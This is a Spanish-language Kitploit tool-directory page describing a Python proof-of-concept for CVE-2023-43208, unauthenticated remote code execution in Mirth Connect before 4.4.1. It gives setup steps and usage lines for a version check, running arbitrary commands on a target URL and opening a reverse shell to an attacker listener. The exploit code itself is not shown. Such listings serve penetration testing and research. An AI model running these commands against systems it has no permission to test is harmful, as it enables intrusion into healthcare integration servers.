Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-43208-PoC — Script en Python de prueba de concepto que demuestra CVE‑2023‑43208 en Mirth Connect, permitiendo verificaciones de versión y ejecución de comandos en instancias vulnerables. | Kitploit
Herramientas/GitHubGitHub/criz117/cve-2023-43208-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubcriz117/cve-2023-43208-poc

CVE-2023-43208-PoC

Script en Python de prueba de concepto que demuestra CVE‑2023‑43208 en Mirth Connect, permitiendo verificaciones de versión y ejecución de comandos en instancias vulnerables.

Ver Repositorio
11hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-43208 - Ejecución Remota de Código (RCE) no autenticada en Mirth Connect

Requisitos

  • Python 3.11 o superior (probado en 3.11, 3.12, 3.13)

Configuración

# Create a clean virtual environment
python3 -m venv .venv
source .venv/bin/activate

# Install pinned dependencies
pip install -r requirements.txt

Uso

# Check version only
python3 CVE-2023-43208.py -u https://TARGET/ --check

# Execute a single command
python3 CVE-2023-43208.py -u https://TARGET/ -c "whoami"

# Reverse shell (start nc listener first)
python3 CVE-2023-43208.py -u https://TARGET/ -l LHOST -p LPORT

Notas

  • Una respuesta 500 del servidor es normal y esperada — el comando se ejecuta de todas formas
  • Afecta a Mirth Connect < 4.4.1

Descargo de responsabilidad

Esta prueba de concepto se proporciona únicamente con fines de investigación y educativos. No la utilice contra sistemas que no posea o para los que no tenga permiso explícito de prueba. El autor no se responsabiliza por cualquier uso indebido o daño causado por este código.

Descargar herramienta